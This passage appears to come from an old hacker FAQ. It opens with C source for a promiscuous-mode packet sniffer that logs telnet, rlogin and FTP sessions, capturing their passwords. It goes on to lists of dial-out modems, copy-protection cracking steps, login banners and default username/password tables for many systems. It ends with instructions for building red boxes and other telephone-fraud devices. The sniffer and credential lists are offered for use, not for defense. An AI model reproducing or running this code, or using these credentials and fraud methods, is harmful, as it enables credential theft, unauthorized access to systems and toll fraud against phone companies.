                                    while(CLe=CLt) { \
                                    CLt=CLe->Next; \
                                    if(CLe->Time <tm) \
                                    END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
                                    } \
                                    } \
                                    }
                                    
                                    void filter(cp, pktlen)
                                    register char *cp;
                                    register u_int pktlen;
                                    {
                                    register struct ip     *ip;
                                    register struct tcphdr *tcph;
                                    
                                    { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
                                    
                                    if(EtherType < 0x600) {
                                    EtherType = *(u_short *)(cp + SZETH + 6);
                                    cp+=8; pktlen-=8;
                                    }
                                    
                                    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
                                    return;
                                    }
                                    
                                    /* ugh, gotta do an alignment :-( */
                                    bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
                                    
                                    ip = (struct ip *)Packet;
                                    if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
                                    return;
                                    tcph = (struct tcphdr *)(Packet + IPHLEN);
                                    
                                    if(!( (TCPD == IPPORT_TELNET) ||
                                    (TCPD == IPPORT_LOGINSERVER) ||
                                    (TCPD == IPPORT_FTP)
                                    )) return;
                                    
                                    { register struct CREC *CLm;
                                    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
                                    register u_char *p = (u_char *)Packet;
                                    
                                    p += ((IPHLEN * 4) + (TCPOFF * 4));
                                    
                                    if(debug) {
                                    fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
                                    fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
                                    fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
                                    }
                                    
                                    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
                                    
                                    CLm->PKcnt++;
                                    
                                    if(length>0)
                                    if( (CLm->Length + length) < MAXBUFLEN ) {
                                    ADDDATA_NODE( CLm, p,length);
                                    } else {
                                    END_NODE( CLm, p,length, "DATA LIMIT");
                                    }
                                    
                                    if(TCPFL(TH_FIN|TH_RST)) {
                                    END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
                                    }
                                    
                                    } else {
                                    
                                    if(TCPFL(TH_SYN)) {
                                    ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
                                    }
                                    
                                    }
                                    
                                    IDLE_NODE();
                                    
                                    }
                                    
                                    }
                                    
                                    /* signal handler
                                    */
                                    void death()
                                    { register struct CREC *CLe;
                                    
                                    while(CLe=CLroot)
                                    END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
                                    
                                    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
                                    fflush(LOG);
                                    if(LOG != stdout)
                                    fclose(LOG);
                                    exit(1);
                                    }
                                    
                                    /* opens network interface, performs ioctls and reads from it,
                                    * passing data to filter function
                                    */
                                    void do_it()
                                    {
                                    int cc;
                                    char *buf;
                                    u_short sp_ts_len;
                                    
                                    if(!(buf=malloc(CHUNKSIZE)))
                                    Pexit(1,"Eth: malloc");
                                    
                                    /* this /dev/nit initialization code pinched from etherfind */
                                    {
                                    struct strioctl si;
                                    struct ifreq    ifr;
                                    struct timeval  timeout;
                                    u_int  chunksize = CHUNKSIZE;
                                    u_long if_flags  = NI_PROMISC;
                                    
                                    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
                                    Pexit(1,"Eth: nit open");
                                    
                                    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
                                    Pexit(1,"Eth: ioctl (I_SRDOPT)");
                                    
                                    si.ic_timout = INFTIM;
                                    
                                    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
                                    Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
                                    
                                    timeout.tv_sec = 1;
                                    timeout.tv_usec = 0;
                                    si.ic_cmd = NIOCSTIME;
                                    si.ic_len = sizeof(timeout);
                                    si.ic_dp  = (char *)&timeout;
                                    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
                                    Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
                                    
                                    si.ic_cmd = NIOCSCHUNK;
                                    si.ic_len = sizeof(chunksize);
                                    si.ic_dp  = (char *)&chunksize;
                                    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
                                    Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
                                    
                                    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
                                    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
                                    si.ic_cmd = NIOCBIND;
                                    si.ic_len = sizeof(ifr);
                                    si.ic_dp  = (char *)&ifr;
                                    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
                                    Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
                                    
                                    si.ic_cmd = NIOCSFLAGS;
                                    si.ic_len = sizeof(if_flags);
                                    si.ic_dp  = (char *)&if_flags;
                                    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
                                    Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
                                    
                                    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
                                    Pexit(1,"Eth: ioctl (I_FLUSH)");
                                    }
                                    
                                    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
                                    register char *bp = buf,
                                    *bufstop = (buf + cc);
                                    
                                    while (bp < bufstop) {
                                    register char *cp = bp;
                                    register struct nit_bufhdr *hdrp;
                                    
                                    hdrp = (struct nit_bufhdr *)cp;
                                    cp += sizeof(struct nit_bufhdr);
                                    bp += hdrp->nhb_totlen;
                                    filter(cp, (u_long)hdrp->nhb_msglen);
                                    }
                                    }
                                    Pexit((-1),"Eth: read");
                                    }
                                    /* Authorize your proogie,generate your own password and uncomment here */
                                    /* #define AUTHPASSWD "EloiZgZejWyms" */
                                    
                                    void getauth()
                                    { char *buf,*getpass(),*crypt();
                                    char pwd[21],prmpt[81];
                                    
                                    strcpy(pwd,AUTHPASSWD);
                                    sprintf(prmpt,"(%s)UP? ",ProgName);
                                    buf=getpass(prmpt);
                                    if(strcmp(pwd,crypt(buf,pwd)))
                                    exit(1);
                                    }
                                    */
                                    void main(argc, argv)
                                    int argc;
                                    char **argv;
                                    {
                                    char   cbuf[BUFSIZ];
                                    struct ifconf ifc;
                                    int    s,
                                    ac=1,
                                    backg=0;
                                    
                                    ProgName=argv[0];
                                    
                                    /*     getauth(); */
                                    
                                    LOG=NULL;
                                    device=NULL;
                                    while((ac<argc) && (argv[ac][0] == '-')) {
                                    register char ch = argv[ac++][1];
                                    switch(toupper(ch)) {
                                    case 'I': device=argv[ac++];
                                    break;
                                    case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                                    Zexit(1,"Output file cant be opened\n");
                                    break;
                                    case 'B': backg=1;
                                    break;
                                    case 'D': debug=1;
                                    break;
                                    default : fprintf(ERR,
                                    "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
                                    ProgName);
                                    exit(1);
                                    }
                                    }
                                    
                                    if(!device) {
                                    if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
                                    Pexit(1,"Eth: socket");
                                    
                                    ifc.ifc_len = sizeof(cbuf);
                                    ifc.ifc_buf = cbuf;
                                    if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
                                    Pexit(1,"Eth: ioctl");
                                    
                                    close(s);
                                    device = ifc.ifc_req->ifr_name;
                                    }
                                    
                                    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
                                    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
                                    (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
                                    
                                    if(!LOG)
                                    LOG=stdout;
                                    
                                    signal(SIGINT, death);
                                    signal(SIGTERM,death);
                                    signal(SIGKILL,death);
                                    signal(SIGQUIT,death);
                                    
                                    if(backg && debug) {
                                    fprintf(ERR,"[Cannot bg with debug on]\n");
                                    backg=0;
                                    }
                                    
                                    if(backg) {
                                    register int s;
                                    
                                    if((s=fork())>0) {
                                    fprintf(ERR,"[pid %d]\n",s);
                                    exit(0);
                                    } else if(s<0)
                                    Pexit(1,"fork");
                                    
                                    if( (s=open("/dev/tty",O_RDWR))>0 ) {
                                    ioctl(s,TIOCNOTTY,(char *)NULL);
                                    close(s);
                                    }
                                    }
                                    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
                                    fflush(LOG);
                                    
                                    do_it();
                                    }
                                    
                                    
                                    21. What is an Internet Outdial?
                                    
                                    An Internet outdial is a modem connected to the Internet than you can
                                    use to dial out.  Normal outdials will only call local numbers.  A GOD
                                    (Global OutDial) is capable of calling long distance.  Outdials are an
                                    inexpensive method of calling long distance BBS's.
                                    
                                    
                                    22. What are some Internet Outdials?
                                    
                                    This FAQ answer is excerpted from: BlackAdders FTP/FSP Site List.
                                    
                                    
                                    Area    Address(s)                      Command(s)
                                    ------  ------------------------------- ---------------------
                                    201     128.112.88.0
                                    128.112.88.1
                                    128.112.88.2
                                    128.112.88.3
                                    204     umnet.cc.manitoba.ca            "dial12" or "dial24"
                                    206     dialout24.cac.washington.edu
                                    215     wiseowl.ocis.temple.edu         atz
                                    atdt 9xxxyyyy
                                    129.72.1.59                     hayes compat
                                    218     aa28.d.umn.edu                  cli
                                    rlogin modem
                                    at "login:" type 
                                    "modem"
                                    modem.d.umn.edu                 "Hayes"
                                    232     isn.rdns.iastate.edu            MODEM              [Works!!]
                                    atz 
                                    atdt8xxx-xxxx
                                    303     129.82.100.64                   login: modem       [need password!]
                                    307     modem.uwyo.edu
                                    129.72.1.59                     hayes compat
                                    313     35.1.1.6                        "dial2400-aa" or   [can't connect]
                                    "dial1200-aa"
                                    404     emory.edu                       .modem8 or
                                    .dialout
                                    broadband.cc.emory.edu          .modem8 or
                                    .dialout
                                    128.140.1.239                   .modem8|CR
                                    or .modem96|CR
                                    412     gate.cis.pitt.edu               LAT
                                    connect dialout
                                    ^E
                                    atdt 91k xxx-xxxx
                                    415     128.32.132.250                  "dial1" or "dial2"
                                    416     pacx.utcs.utoronto.ca           modem
                                    atdt 9xxx-xxxx
                                    502     uknet.uky.edu                   outdial2400
                                    atdt 9xxx-xxxx
                                    510     annex132-1.eecs.berkeley.edu    atdt 9,,,,, xxx-xxxx
                                    514     132.204.2.11                    externe#9 9xxx-xxxx
                                    515     isn.rdns.iastate.edu            login MODEM 
                                    dial atdt8xxx-yyyy
                                    602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy
                                    129.219.17.3                    login: MODEM
                                    atdt 8xxx-xxxx
                                    609     129.72.1.59                     "Hayes"
                                    128.119.131.110                 "Hayes"
                                    128.119.131.111         
                                    128.119.131.112
                                    128.119.131.113
                                    128.119.131.114
                                    128.112.131.110
                                    128.112.131.111
                                    128.112.131.112
                                    128.112.131.113
                                    128.112.131.114                 the above are hayes
                                    614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]
                                    615     dca.utk.edu                     "dial2400"
                                    617     dialout.lcs.mit.edu
                                    619     dialin.ucsd.edu                 "dialout"
                                    128.54.30.1                     nue
                                    713     128.143.70.101                  "connect hayes"
                                    128.249.27.154                  c modem96
                                    atdt 9xxx-xxxx
                                    128.249.27.153                  " -+ as above +- "
                                    modem24.bcm.tmc.edu
                                    modem12.bcm.tmc.edu
                                    714     130.191.4.70                    atdt 8xxx-xxxx
                                    804     ublan.acc.virginia.edu          c hayes
                                    128.143.70.101                  connect hayes
                                    atdt xxx-xxxx
                                    902     star.ccs.tuns.ca                "dialout"          [down...]
                                    916     128.120.2.251                   "dialout"          [down...]
                                    129.137.33.72                                      [can't connect]
                                    ???     dialout1.princeton.edu                             [can't connect]
                                    dswitch.byu.edu                 "C Modem"          [can't connect]
                                    modem.cis.uflu.edu                                 [can't connect]
                                    r596adi1.uc.edu                                    [can't connect]
                                    vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]
                                    18.26.0.55                                         [can't connect]
                                    128.173.5.4                                        [need password!]
                                    128.187.1.2                                        [need password!]
                                    129.137.33.71                                      [can't connect]
                                    bstorm.bga.com / port=4000                         [what is this?]
                                    
                                    
                                    N 23. What is an anonymous remailer?
                                    
                                    An anonymous remailer is a system on the Internet that allows you to
                                    send e-mail anonymously or post messages to Usenet anonymously.
                                    
                                    You apply for an anonymous ID at the remailer site.  Then, when you
                                    send a message to the remailer, it sends it out from your anonymous ID
                                    at the remailer.  No one reading the post will know your real account
                                    name or host name.  If someone sends a message to your anonymous ID,
                                    it will be forwarded to your real account by the remailer.
                                    
                                    
                                    N 24. What are the addresses of some anonymous remailers?
                                    
                                    The most popular and stable anonymous remailer is anon.penet.fi,
                                    operated by Johan Helsingus.  To obtain an anonymous ID, mail
                                    ping@anon.penet.fi.  For assistance is obtaining an anonymous account
                                    at penet, mail help@anon.penet.fi.
                                    
                                    
                                    N 23. How do I defeat Copy Protection?
                                    
                                    There are two common methods of defeating copy protection.  The first
                                    is to use a program that removes copy protection.  Popular programs
                                    that do this are CopyIIPC from Central Point Software and CopyWrite
                                    from Quaid Software.  The second method involves patching the copy
                                    protected program.  For popular software, you may be able to locate a
                                    ready made patch.  You can them apply the patch using any hex editor,
                                    such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
                                    patch the software yourself.
                                    
                                    Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
                                    also requires some knowledge of assembly language.  Load the protected
                                    program under the debugger and watch for it to check the protection
                                    mechanism.  When it does, change that portion of the code.  The code
                                    can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
                                    JMP (Jump Unconditionally).  Or the code may simply be replaced with
                                    NOP (No Operation) instructions.
                                    
                                    
                                    N 24. What is this system?
                                    
                                    AS/400
                                    ~~~~~~
                                    > UserID?
                                    > Password?
                                    >
                                    > Once in, type GO MAIN
                                    
                                    CDC Cyber
                                    ~~~~~~~~~
                                    > WELCOME TO THE NOS SOFTWARE SYSTEM.
                                    > COPYRIGHT CONTROL DATA 1978, 1987.
                                    >
                                    > 88/02/16. 02.36.53. N265100
                                    > CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
                                    > FAMILY:
                                    >
                                    > You would normally just hit return at the family prompt.  Next prompt is:
                                    >
                                    > USER NAME:
                                    
                                    Hewlett Packard MPE-XL
                                    ~~~~~~~~~~~~~~~~~~~~~~
                                    > MPE XL:
                                    > EXPECTED A :HELLO COMMAND. (CIERR 6057)
                                    > MPE XL:
                                    > EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
                                    > MPE XL:
                                    
                                    GTN
                                    ~~~
                                    > WELCOME TO CITIBANK. PLEASE SIGN ON.
                                    > XXXXXXXX
                                    >
                                    > @
                                    > PASSWORD =
                                    >
                                    > @
                                    >
                                    > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                    >
                                    > PLEASE ENTER YOUR ID:-1->
                                    > PLEASE ENTER YOUR PASSWORD:-2->
                                    >
                                    > CITICORP (CITY NAME). KEY GHELP FOR HELP.
                                    >   XXX.XXX
                                    >  PLEASE SELECT SERVICE REQUIRED.-3->
                                    
                                    PRIMOS
                                    ~~~~~~
                                    > PRIMENET 19.2.7F PPOA1
                                    >
                                    > <any text>
                                    >
                                    > ER!
                                    >
                                    > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                    >
                                    > CONNECT
                                    > Primenet V 2.3  (system)
                                    > LOGIN           (you)
                                    > User id?        (system)
                                    > SAPB5           (you)
                                    > Password?       (system)
                                    > DROWSAP         (you)
                                    > OK,             (system)
                                    
                                    ROLM-OSL
                                    ~~~~~~~~
                                    > MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
                                    > RELEASE 8003
                                    > OSL, PLEASE.
                                    > ?
                                    
                                    Tops-10
                                    ~~~~~~~
                                    > NIH Timesharing
                                    >
                                    > NIH Tri-SMP 7.02-FF  16:30:04 TTY11
                                    > system 1378/1381/1453 Connected to Node Happy(40) Line # 12
                                    > Please LOGIN
                                    > .
                                    
                                    VM/370
                                    ~~~~~~
                                    > VM/370
                                    > !
                                    
                                    
                                    N 25. What are the default accounts for XXX?
                                    
                                    AS/400
                                    ~~~~~~
                                    > qsecofr/qsecofr (master security officer)
                                    > qsysopr/qsysopr (system operator)
                                    > qpgmr/qpgmr     (default programmer)
                                    >
                                    > also
                                    >
                                    > secofr/secofr (sometimes...)
                                    > ibm/password
                                    > ibm/2222
                                    > ibm/service
                                    
                                    Hewlett Packard MPE-XL
                                    ~~~~~~~~~~~~~~~~~~~~~~
                                    > Format is Account.Group,Job
                                    >
                                    > HELLO           Account           Password
                                    > ~~~~~           ~~~~~~~~~~~~~     ~~~~~~~~~~~
                                    > HELLO           MANAGER.SYS
                                    > HELLO           MGR.SYS
                                    > HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
                                    > HELLO           OP.OPERATOR
                                    > MGR             .CAROLIAN
                                    > MGR             .CCC
                                    > MGR             .CNAS
                                    > MGR             .CONV
                                    > MGR             .COGNOS
                                    > OPERATOR        .COGNOS
                                    > MANAGER         .COGNOS
                                    > OPERATOR        .DISC
                                    > MGR             .HPDESK
                                    > MGR             .HPWORD
                                    > FIELD           .HPWORD
                                    > MGR             .HPOFFICE
                                    > SPOOLMAN        .HPOFFICE
                                    > ADVMAIL         .HPOFFICE
                                    > MAIL            .HPOFFICE
                                    > WP              .HPOFFICE
                                    > MANAGER         .HPOFFICE
                                    > MGR             .HPONLY
                                    > FIELD           .HPP187
                                    > MGR             .HPP187
                                    > MGR             .HPP189
                                    > MGR             .HPP196
                                    > MGR             .INTX3
                                    > MGR             .ITF3000
                                    > MANAGER         .ITF3000
                                    > MAIL            .MAIL
                                    > MGR             .NETBASE
                                    > MGR             .REGO
                                    > MGR             .RJE
                                    > MGR             .ROBELLE
                                    > MANAGER         .SECURITY
                                    > MGR             .SECURITY
                                    > FIELD           .SERVICE
                                    > MANAGER         .SYS
                                    > MGR             .SYS
                                    > PCUSER          .SYS
                                    > RSBCMON         .SYS
                                    > OPERATOR        .SYS
                                    > OPERATOR        .SYSTEM
                                    > FIELD           .SUPPORT
                                    > OPERATOR        .SUPPORT
                                    > MANAGER         .TCH
                                    > MAIL            .TELESUP
                                    > MANAGER         .TELESUP
                                    > MGR             .TELESUP
                                    > SYS             .TELESUP
                                    > MGE             .VESOFT
                                    > MGE             .VESOFT
                                    > MGR             .WORD
                                    > MGR             .XLSERVER
                                    >
                                    > Common jobs are Pub, Sys, Data
                                    > Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
                                    
                                    PICK O/S
                                    ~~~~~~~~
                                    > DSA             # Desquetop System Administrator
                                    > DS
                                    > DESQUETOP
                                    > PHANTOM
                                    
                                    Rolm
                                    ~~~~
                                    > CBX Defaults
                                    >
                                    > op              op
                                    > op              operator
                                    > su              super
                                    > admin           pwp
                                    > eng             engineer
                                    >
                                    >
                                    > PhoneMail Defaults
                                    >
                                    > sysadmin        sysadmin
                                    > tech            tech
                                    > poll            tech
                                    
                                    RSX
                                    ~~~
                                    > SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
                                    > 1,1/system      (Directory [1,1] Password SYSTEM)
                                    > BATCH/BATCH
                                    > SYSTEM/MANAGER
                                    > USER/USER
                                    >
                                    > Default accounts for Micro/RSX:
                                    >
                                    >                 MICRO/RSX
                                    >
                                    > Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
                                    > date and create an account using:
                                    >
                                    >                 RUN ACNT
                                    >             or  RUN $ACNT
                                    >
                                    > (Numbers below 10 {oct} are Priveledged)
                                    >
                                    > Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
                                    > type "abo at." You must include the . dot!
                                    >
                                    > If this works, type "acs lb0:/blks=1000" to get some swap space so the
                                    > new step won't wedge.
                                    >
                                    > type " run $acnt" and change the password of any account with a group
                                    > number of 7 or less.
                                    >
                                    > You may find that the ^C does not work. Try ^Z and ESC as well.
                                    > Also try all 3 as terminators to valid and invalid times.
                                    >
                                    > If none of the above work, use the halt switch to halt the system,
                                    > just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
                                    > then deposit 177777 into R6, cross your fingers, write protect the drive
                                    > and continue the system.  This will hopefully result in indirect blowing
                                    > up...  And hopefully the system has not been fully secured.
                                    
                                    System 75
                                    ~~~~~~~~~
                                    > Username        Passwords
                                    > ~~~~~~~~        ~~~~~~~~~
                                    > bcim            bcimpw
                                    > bciim           bciimpw
                                    > bcms            bcmspw, bcms
                                    > bcnas           bcnspw
                                    > blue            bluepw
                                    > browse          looker, browsepw
                                    > craft           crftpw, craftpw, crack
                                    > cust            custpw
                                    > enquiry         enquirypw
                                    > field           support
                                    > inads           indspw, inadspw, inads
                                    > init            initpw
                                    > kraft           kraftpw
                                    > locate          locatepw
                                    > maint           maintpw, rwmaint
                                    > nms             nmspw
                                    > rcust           rcustpw
                                    > support         supportpw
                                    > tech            field
                                    
                                    Verifone Junior 2.05
                                    ~~~~~~~~~~~~~~~~~~~~
                                    > Default password: 166816
                                    
                                    
                                    N 26. What port is XXX on?
                                    
                                    The file /etc/services on most Unix machines lists the activity
                                    occuring on each port.  Here is a sample /etc/services file from
                                    Linux:
                                    
                                    #
                                    # services      This file describes the various services that are
                                    #               available from the TCP/IP subsystem.  It should be
                                    #               consulted instead of using the numbers in the ARPA
                                    #               include files, or, worse, just guessing them.
                                    #
                                    # Version:      @(#)/etc/services       3.02    02/21/93
                                    #
                                    # Author:       Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>
                                    #
                                    
                                    tcpmux          1/tcp                           # rfc-1078
                                    echo            7/tcp
                                    echo            7/udp
                                    discard         9/tcp           sink null
                                    discard         9/udp           sink null
                                    systat          11/tcp          users
                                    daytime         13/tcp
                                    daytime         13/udp
                                    netstat         15/tcp
                                    qotd            17/tcp          quote
                                    chargen         19/tcp          ttytst source
                                    chargen         19/udp          ttytst source
                                    ftp-data        20/tcp
                                    ftp             21/tcp
                                    telnet          23/tcp
                                    smtp            25/tcp          mail
                                    time            37/tcp          timserver
                                    time            37/udp          timserver
                                    rlp             39/udp          resource        # resource location
                                    name            42/udp          nameserver
                                    whois           43/tcp          nicname         # usually to sri-nic
                                    domain          53/tcp
                                    domain          53/udp
                                    mtp             57/tcp                          # deprecated
                                    bootps          67/udp                          # bootp server
                                    bootpc          68/udp                          # bootp client
                                    tftp            69/udp
                                    rje             77/tcp
                                    finger          79/tcp
                                    link            87/tcp          ttylink
                                    supdup          95/tcp                          # BSD supdupd(8)
                                    hostnames       101/tcp         hostname        # usually to sri-nic
                                    iso-tsap        102/tcp
                                    x400            103/tcp                         # ISO Mail
                                    x400-snd        104/tcp
                                    csnet-ns        105/tcp
                                    pop-2           109/tcp                         # PostOffice V.2
                                    pop-3           110/tcp                         # PostOffice V.3
                                    sunrpc          111/tcp
                                    sunrpc          111/tcp         portmapper      # RPC 4.0 portmapper UDP
                                    sunrpc          111/udp
                                    sunrpc          111/udp         portmapper      # RPC 4.0 portmapper TCP
                                    ident           113/tcp         auth tap        # identd
                                    sftp            115/tcp
                                    uucp-path       117/tcp
                                    nntp            119/tcp         usenet          # Network News Transfer
                                    ntp             123/tcp                         # Network Time Protocol
                                    ntp             123/udp                         # Network Time Protocol
                                    netbios-ns      137/tcp         nbns
                                    netbios-ns      137/udp         nbns
                                    netbios-dgm     138/tcp         nbdgm
                                    netbios-dgm     138/udp         nbdgm
                                    netbios-ssn     139/tcp         nbssn
                                    NeWS            144/tcp         news            # Window System
                                    snmp            161/udp
                                    snmp-trap       162/udp
                                    exec            512/tcp                         # BSD rexecd(8)
                                    biff            512/udp         comsat
                                    login           513/tcp                         # BSD rlogind(8)
                                    who             513/udp         whod            # BSD rwhod(8)
                                    shell           514/tcp         cmd             # BSD rshd(8)
                                    syslog          514/udp                         # BSD syslogd(8)
                                    printer         515/tcp         spooler         # BSD lpd(8)
                                    talk            517/udp                         # BSD talkd(8)
                                    ntalk           518/udp                         # SunOS talkd(8)
                                    efs             520/tcp                         # for LucasFilm
                                    route           520/udp         router routed   # 521/udp too
                                    timed           525/udp         timeserver
                                    tempo           526/tcp         newdate
                                    courier         530/tcp         rpc             # experimental
                                    conference      531/tcp         chat
                                    netnews         532/tcp         readnews
                                    netwall         533/udp                         # -for emergency broadcasts
                                    uucp            540/tcp         uucpd           # BSD uucpd(8) UUCP service
                                    new-rwho        550/udp         new-who         # experimental
                                    remotefs        556/tcp         rfs_server rfs  # Brunhoff remote filesystem
                                    rmonitor        560/udp         rmonitord       # experimental
                                    monitor         561/udp                         # experimental
                                    pcserver        600/tcp                         # ECD Integrated PC board srvr
                                    mount           635/udp                         # NFS Mount Service
                                    pcnfs           640/udp                         # PC-NFS DOS Authentication
                                    bwnfs           650/udp                         # BW-NFS DOS Authentication
                                    listen          1025/tcp        listener RFS remote_file_sharing
                                    nterm           1026/tcp        remote_login network_terminal
                                    ingreslock      1524/tcp
                                    tnet            1600/tcp                        # transputer net daemon
                                    nfs             2049/udp                        # NFS File Service
                                    irc             6667/tcp                        # Internet Relay Chat
                                    dos             7000/tcp        msdos
                                    
                                    # End of services.
                                    
                                    
                                    Section B: Telephony
                                    ~~~~~~~~~~~~~~~~~~~~
                                    
                                    01. What is a Red Box?
                                    
                                    When a coin is inserted into a payphone, the phone emits a set of
                                    tones.  A red box is a device that simulates those tones, with the
                                    purpose of fooling the payphone into believing you have inserted an
                                    actual coin.  The actual tones are:
                                    
                                    Nickel Signal      1700+2200  0.060s on
                                    Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
                                    Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
                                    
                                    
                                    02. How do I build a Red Box?
                                    
                                    Red boxes are commonly manufactured from modified Radio Shack tone
                                    dialers, Hallmark greeting cards, or made from scratch from readily
                                    available electronic components.
                                    
                                    To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
                                    open the dialer and replace the crystal (the largest shiny metal
                                    component).  The exact value needed is 6.502457409Mhz.  Unfortunately,
                                    that crystal is not commonly manufactured.  A crystal close to that
                                    value will create a tone that falls within tolerances.  The most
                                    popular choice is the 6.5536Mhz crystal.  When you are finished
                                    replacing the crystal, program the P1 button with five *'s.  That will
                                    simulate a quarter tone each time you press P1.
                                    
                                    
                                    03. Where can I get a 6.5536Mhz crystal?
                                    
                                    Your best bet is a local electronics store.  Radio Shack sells them,
                                    but they are overpriced and the store must order them in.  This takes
                                    approximately two weeks.  In addition, many Radio Shack employees do
                                    not know that this can be done.
                                    
                                    Or, you could order the crystal mail order.  This introduces Shipping
                                    and Handling charges, which are usually much greater than the price of
                                    the crystal.  It's best to get several people together to share the
                                    S&H cost.  Or, buy five or six yourself and sell them later.  Some of
                                    the places you can order crystals are:
                                    
                                    JDR Microdevices:
                                    2233 Branham Lane
                                    San Jose, CA 95124
                                    (800)538-5000
                                    Part Number: 6.5536MHZ
                                    
                                    Tandy Express Order Marketing
                                    401 NE 38th Street
                                    Fort Worth, TX 76106
                                    (800)241-8742
                                    Part Number: 10068625
                                    
                                    
                                    04. Which payphones will a Red Box work on?
                                    
                                    Red Boxes will work on TelCo owned payphones, but not on COCOT's
                                    (Customer Owned Coin Operated Telephones).
                                    
                                    
                                    05. What is a Blue Box?
                                    
                                    Blue boxes use a 2600hz tone to convince telephone switches that use
                                    in-band signalling that the caller is actually a telephone operator.
                                    The caller may then access special switch functions, with the usual
                                    purpose of making free long distance phone calls, using the
                                    Multi-Frequency tones provided by the Blue Box.
                                    
                                    
                                    06. Do Blue Boxes still work?
                                    
                                    Blue Boxes still work in areas using in-band signalling.  Modern phone
                                    signalling switches using ESS (Electronic Signalling Systems) use
                                    out-of-band-signalling.  Nothing you send over the voice portion of
                                    bandwidth can control the switch.
                                    
                                    
                                    07. What is a Black Box?
                                    
                                    A Black Box is a 10k ohm resistor placed across your phone line to
                                    cause the phone company equipment to be unable to detect that you have
                                    answered your telephone.  People who call you will then not be billed
                                    for the telephone call.
                                    
                                    
                                    08. What do all the colored boxes do?
                                    
                                    Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
                                    Call Forwarding on old 4-wire phone systems
                                    Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
                                    Beige        Lineman's hand set
                                    Black        Allows the calling party to not be billed for the call
                                    placed
                                    Blast        Phone microphone amplifier
                                    Blotto       Supposedly shorts every fone out in the immediate area
                                    Blue         Emulate a true operator by siezing a trunk with a 2600hz
                                    tone
                                    Brown        Create a party line from 2 phone lines
                                    Bud          Tap into your neighbors phone line
                                    Chartreuse   Use the electricity from your phone line
                                    Cheese       Connect two phones to create a divertor
                                    Chrome       Manipulate Traffic Signals by Remote Control
                                    Clear        A telephone pickup coil and a small amp use to make free
                                    calls on Fortress Phones
                                    Color        Line activated telephone recorder
                                    Copper       Cause crosstalk interference on an extender
                                    Crimson      Hold button
                                    Dark         Re-route outgoing or incoming calls to another phone
                                    Dayglo       Connect to your neighbors phone line
                                    Divertor     Re-route outgoing or incoming calls to another phone
                                    DLOC         Create a party line from 2 phone lines
                                    Gold         Trace calls, tell if the call is being traced, and can
                                    change a trace
                                    Green        Emulate the Coin Collect, Coin Return, and Ringback tones
                                    Infinity     Remotely activated phone tap
                                    Jack         Touch-Tone key pad
                                    Light        In-use light
                                    Lunch        AM transmitter
                                    Magenta      Connect a remote phone line to another remote phone line
                                    Mauve        Phone tap without cutting into a line
                                    Neon         External microphone
                                    Noise        Create line noise
                                    Olive        External ringer
                                    Party        Create a party line from 2 phone lines
                                    Pearl        Tone generator
                                    Pink         Create a party line from 2 phone lines
                                    Purple       Telephone hold button
